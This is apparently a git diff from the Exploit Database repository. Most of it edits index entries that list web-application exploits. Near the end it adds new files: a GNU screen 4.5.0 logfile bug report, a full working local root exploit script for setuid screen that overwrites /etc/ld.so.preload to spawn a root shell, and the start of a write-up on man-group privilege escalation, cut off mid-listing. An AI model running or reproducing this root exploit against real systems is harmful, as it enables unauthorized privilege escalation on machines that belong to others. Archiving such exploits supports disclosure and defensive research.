 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0
 28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0
 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0
-27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0
+27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,php,webapps,0
 27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0
 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
 27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
@ -29327,7 +29331,7 @@ id,file,description,date,author,platform,type,port
 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0
 27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0
-27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - member.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0
+27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php' sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0
 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0
 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps,0
 27784,platforms/php/webapps/27784.txt,"PlanetGallery - Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0
@ -29467,7 +29471,7 @@ id,file,description,date,author,platform,type,port
 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0
 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0
 27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 - 'Username' SQL Injection",2006-06-05,FarhadKey,php,webapps,0
-27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - comments.php SQL Injection",2006-06-05,ajann,php,webapps,0
+27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - 'comments.php' SQL Injection",2006-06-05,ajann,php,webapps,0
 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 - 'index.php' Cross-Site Scripting",2006-06-06,Luny,php,webapps,0
 27985,platforms/php/webapps/27985.txt,"AZ Photo Album Script Pro - Cross-Site Scripting",2006-05-23,Luny,php,webapps,0
 27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 - galimage.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0
@ -30020,7 +30024,7 @@ id,file,description,date,author,platform,type,port
 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0
 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0
 28778,platforms/php/webapps/28778.txt,"ironwebmail 6.1.1 - Directory Traversal Information Disclosure",2006-10-16,"Derek Callaway",php,webapps,0
-28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - Getimg.php Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0
+28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 - 'Getimg.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0
 28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
 28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
 28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0
@ -30032,7 +30036,7 @@ id,file,description,date,author,platform,type,port
 28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b - config.php Remote File Inclusion",2006-10-12,"Le CoPrA",php,webapps,0
 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0
 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0
-28794,platforms/php/webapps/28794.txt,"4Images 1.7 - details.php Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0
+28794,platforms/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0
 28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 - upload.php Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0
 28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0
 28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
@ -30555,7 +30559,7 @@ id,file,description,date,author,platform,type,port
 29504,platforms/php/webapps/29504.txt,"Unique Ads - Banner.php SQL Injection",2007-01-22,Linux_Drox,php,webapps,0
 29505,platforms/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0
 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0
-29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - show.php Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0
+29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - 'show.php' Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0
 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0
 30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0
 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0
@ -30971,7 +30975,7 @@ id,file,description,date,author,platform,type,port
 30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0
 30076,platforms/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0
 30077,platforms/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",asp,webapps,0
-30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - rating.php Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0
+30079,platforms/php/webapps/30079.txt,"2z Project 0.9.5 - 'rating.php' Cross-Site Scripting",2007-05-23,"Janek Vind",php,webapps,0
 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - news.asp Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0
 30082,platforms/php/webapps/30082.txt,"GNUTurk - Mods.php Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0
 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0
@ -31147,7 +31151,7 @@ id,file,description,date,author,platform,type,port
 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0
 30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0
 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0
-30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) <=c 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0
+30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) <  2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0
 30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,php,webapps,0
 30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion",2007-07-09,Crackers_Child,php,webapps,0
 30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0
@ -31178,7 +31182,7 @@ id,file,description,date,author,platform,type,port
 30557,platforms/php/webapps/30557.txt,"Claroline 1.x - admin/adminusers.php dir Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0
 30558,platforms/php/webapps/30558.txt,"Claroline 1.x - admin/advancedUserSearch.php action Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0
 30559,platforms/php/webapps/30559.txt,"Claroline 1.x - admin/campusProblem.php view Parameter Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0
-30560,platforms/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - Read.php SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0
+30560,platforms/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - 'Read.php' SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0
 31025,platforms/cgi/webapps/31025.txt,"Garment Center - 'index.cgi' Local File Inclusion",2008-01-14,Smasher,cgi,webapps,0
 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 - CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",php,webapps,0
 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - users/register.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0
@ -31345,7 +31349,7 @@ id,file,description,date,author,platform,type,port
 30746,platforms/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",php,webapps,0
 30747,platforms/asp/webapps/30747.txt,"Rapid Classified - 'AgencyCatResult.asp' SQL Injection",2007-11-08,The-0utl4w,asp,webapps,0
 30748,platforms/php/webapps/30748.txt,"XOOPS 2.0.17.1 Mylinks Module - Brokenlink.php SQL Injection",2007-11-09,root@hanicker.it,php,webapps,0
-30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0
+30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - 'modules.php' SQL Injection",2007-11-12,0x90,php,webapps,0
 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0
 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0
 30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
@ -33860,12 +33864,12 @@ id,file,description,date,author,platform,type,port
 34974,platforms/php/webapps/34974.txt,"WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0
 34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0
 34995,platforms/php/webapps/34995.txt,"Simea CMS - 'index.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0
-34984,platforms/php/webapps/34984.py,"Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (1)",2014-10-16,fyukyuk,php,webapps,0
+34984,platforms/php/webapps/34984.py,"Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (1)",2014-10-16,fyukyuk,php,webapps,0
 34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE - 'name_new' Parameter Cross-Site Scripting",2010-11-10,MustLive,php,webapps,0
 34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0
 34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting",2010-11-09,thelightcosine,php,webapps,0
 34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,php,webapps,0
-34992,platforms/php/webapps/34992.txt,"Drupal 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (2)",2014-10-17,"Claudio Viviani",php,webapps,0
+34992,platforms/php/webapps/34992.txt,"Drupal 7.0 < 7.31 - SQL Injection (SA-CORE-2014-005) (2)",2014-10-17,"Claudio Viviani",php,webapps,0
 34993,platforms/php/webapps/34993.php,"Drupal 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0
 35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0
 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0
@ -34399,7 +34403,7 @@ id,file,description,date,author,platform,type,port
 35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection",2015-01-26,Vulnerability-Lab,php,webapps,0
 35900,platforms/cgi/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass",2015-01-26,Vulnerability-Lab,cgi,webapps,0
 35980,platforms/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery",2015-02-03,"Mohamed Idris",multiple,webapps,8020
-35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 (< Build 9031) - User Privileges Management",2015-01-26,"Rewterz - Research Group",jsp,webapps,0
+35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management",2015-01-26,"Rewterz - Research Group",jsp,webapps,0
 35906,platforms/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",php,webapps,0
 35908,platforms/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,multiple,webapps,0
 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0
@ -35062,7 +35066,7 @@ id,file,description,date,author,platform,type,port
 36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x - 'select_users_template' Parameter Local File Inclusion",2012-03-05,"Aung Khant",php,webapps,0
 36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 - admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
 36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 - admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
-36913,platforms/php/webapps/36913.pl,"Joomla! - 'redirect.php' SQL Injection",2012-03-05,"Colin Wong",php,webapps,0
+36913,platforms/php/webapps/36913.pl,"Joomla! 2.5.1 - 'redirect.php' Time Based SQL Injection",2012-03-05,"Colin Wong",php,webapps,0
 36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Inclusion",2015-05-04,Vulnerability-Lab,ios,webapps,0
 36973,platforms/php/webapps/36973.txt,"GNUBoard 4.34.20 - 'download.php' HTML Injection",2012-03-20,wh1ant,php,webapps,0
 36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Inclusion",2015-05-06,Vulnerability-Lab,ios,webapps,0
@ -36113,7 +36117,7 @@ id,file,description,date,author,platform,type,port
 38728,platforms/php/webapps/38728.txt,"AlegroCart 1.2.8 - Local File Inclusion / Remote File Inclusion",2015-11-16,"Curesec Research Team",php,webapps,80
 38729,platforms/php/webapps/38729.txt,"ClipperCMS 1.3.0 - Multiple SQL Injections",2015-11-16,"Curesec Research Team",php,webapps,80
 38737,platforms/php/webapps/38737.txt,"Twilight CMS - DeWeS Web Server Directory Traversal",2013-08-21,"High-Tech Bridge",php,webapps,0
-38738,platforms/python/webapps/38738.txt,"Plone - 'in_portal.py' <= 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",python,webapps,0
+38738,platforms/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",python,webapps,0
 38739,platforms/java/webapps/38739.txt,"SearchBlox - Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",php,webapps,0
 38744,platforms/php/webapps/38744.txt,"appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0
@ -36177,7 +36181,7 @@ id,file,description,date,author,platform,type,port
 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
 38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
-39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
+39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
 38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
@ -36223,7 +36227,7 @@ id,file,description,date,author,platform,type,port
 38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0
 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80
 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80
-38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <= 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
+38929,platforms/hardware/webapps/38929.txt,"Skybox Platform < 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0
 38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0
 38938,platforms/php/webapps/38938.txt,"xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0
@ -36484,7 +36488,7 @@ id,file,description,date,author,platform,type,port
 39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject",2016-02-19,Vulnerability-Lab,php,webapps,0
 39474,platforms/php/webapps/39474.txt,"Chamilo LMS - Persistent Cross-Site Scripting",2016-02-19,Vulnerability-Lab,php,webapps,0
 39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
-39478,platforms/php/webapps/39478.txt,"SOLIDserver <= 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
+39478,platforms/php/webapps/39478.txt,"SOLIDserver < 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
 39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
 39486,platforms/windows/webapps/39486.txt,"Dell OpenManage Server Administrator 8.2 - Authenticated Directory Traversal",2016-02-23,hantwister,windows,webapps,0
@ -36506,7 +36510,7 @@ id,file,description,date,author,platform,type,port
 39547,platforms/php/webapps/39547.txt,"WordPress Plugin Best Web Soft Captcha 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80
 39548,platforms/php/webapps/39548.txt,"WordPress Plugin WP Advanced Comment 0.10 - Persistent Cross-Site Scripting",2016-03-10,"Mohammad Khaleghi",php,webapps,80
 39552,platforms/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80
-39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
+39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
 39558,platforms/php/webapps/39558.txt,"WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80
 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80
 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
@ -37084,3 +37088,6 @@ id,file,description,date,author,platform,type,port
 41143,platforms/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",php,webapps,0
 41147,platforms/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",hardware,webapps,0
 41150,platforms/php/webapps/41150.txt,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",php,webapps,80
+41155,platforms/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps,0
+41156,platforms/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps,0
+41157,platforms/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps,0
--- a/platforms/linux/local/41152.txt
+++ b/platforms/linux/local/41152.txt
@ -0,0 +1,26 @@
+Commit f86a374 ("screen.c: adding permissions check for the logfile name",
+2015-11-04)
+
+The check opens the logfile with full root privileges. This allows us to
+truncate any file or create a root-owned file with any contents in any
+directory and can be easily exploited to full root access in several ways.
+
+> address@hidden:~$ screen --version
+> Screen version 4.05.00 (GNU) 10-Dec-16
+> address@hidden:~$ id
+> uid=125(buczek) gid=125(buczek)
+groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
+> address@hidden:~$ cd /etc
+> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
+> address@hidden:/etc (master)$ ls -l bla.bla
+> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
+> address@hidden:/etc (master)$ cat bla.bla
+> fail
+> address@hidden:/etc (master)$ 
+
+Donald Buczek <address@hidden>
+
+
+
+
+EDB Note: Follow up ~ http://seclists.org/oss-sec/2017/q1/184
--- a/platforms/linux/local/41154.sh
+++ b/platforms/linux/local/41154.sh
@ -0,0 +1,42 @@
+#!/bin/bash
+# screenroot.sh
+# setuid screen v4.5.0 local root exploit
+# abuses ld.so.preload overwriting to get root.
+# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
+# HACK THE PLANET
+# ~ infodox (25/1/2017) 
+echo "~ gnu/screenroot ~"
+echo "[+] First, we create our shell and library..."
+cat << EOF > /tmp/libhax.c
+#include <stdio.h>
+#include <sys/types.h>
+#include <unistd.h>
+__attribute__ ((__constructor__))
+void dropshell(void){
+    chown("/tmp/rootshell", 0, 0);
+    chmod("/tmp/rootshell", 04755);
+    unlink("/etc/ld.so.preload");
+    printf("[+] done!\n");
+}
+EOF
+gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
+rm -f /tmp/libhax.c
+cat << EOF > /tmp/rootshell.c
+#include <stdio.h>
+int main(void){
+    setuid(0);
+    setgid(0);
+    seteuid(0);
+    setegid(0);
+    execvp("/bin/sh", NULL, NULL);
+}
+EOF
+gcc -o /tmp/rootshell /tmp/rootshell.c
+rm -f /tmp/rootshell.c
+echo "[+] Now we create our /etc/ld.so.preload file..."
+cd /etc
+umask 000 # because
+screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
+echo "[+] Triggering..."
+screen -ls # screen itself is setuid, so... 
+/tmp/rootshell
--- a/platforms/linux/local/41158.txt
+++ b/platforms/linux/local/41158.txt
@ -0,0 +1,314 @@
+/*
+EDB Note: 
+man:man -> man:root ~ http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
+man:root -> root:root ~ http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/
+
+CreateSetgidBinary.c ~ http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/CreateSetgidBinary.c
+DirModifyInotify-20110530.c ~ http://www.halfdog.net/Security/2010/FilesystemRecursionAndSymlinks/DirModifyInotify-20110530.c
+*/
+
+
+
+
+## man:man -> man:root
+
+Setgid Binary Creater: The program CreateSetgidBinary.c allows to create the suitable setgid binary circumventing the kernel protection. Currently creating an empty setgid executable in /var/cache/man would work but writing as user man will remove the setgid flag silently. Hence let root itself write binary code to it keeping the flags. But that is not so simple:
+- Writing an interpreter header would be simple, but start of interpreter in kernel will drop the setgid capability immediately.
+- Hence an ELF binary has to be written. The shellcode from below is just 155 bytes to perform setresgid and execute a shell
+- We need a SUID binary to write arbitrary data to stdout with similar method already used in SuidBinariesAndProcInterface. But they do not just echo, they may perform some kind of transformation, e.g. use basename of arg0 for printing. To avoid transformation do not use SUID binary directly but let ld-linux fault and write out user supplied data without modifications. The faulting can triggered easily using LowMemoryProgramCrashing from previous work.
+- I did not find any SUID binary writing out null-bytes, so they cannot provide the mandatory null-bytes within the ELF header on stdout/stderr. But kernel will help here, just seek beyond end of file before invoking SUID binary, thus filling gap with 0-bytes.
+- The SUID binaries do not write only arg0 but also some error message, thus appending unneeded data to the growing file. As kernel does not allow truncation without losing the setgid property, the SUID binary has to be stopped writing more than needed. This can be done using the nice setrlimit(RLIMIT_FSIZE, ... system call.
+
+Program Invocation: Following sequence can be used for testing:
+
+```
+root$ su -s /bin/bash man
+man$ cd
+man$ pwd
+/var/cache/man
+man$ ls -al /proc/self/
+total 0
+dr-xr-xr-x   9 man  man  0 May 15 02:08 .
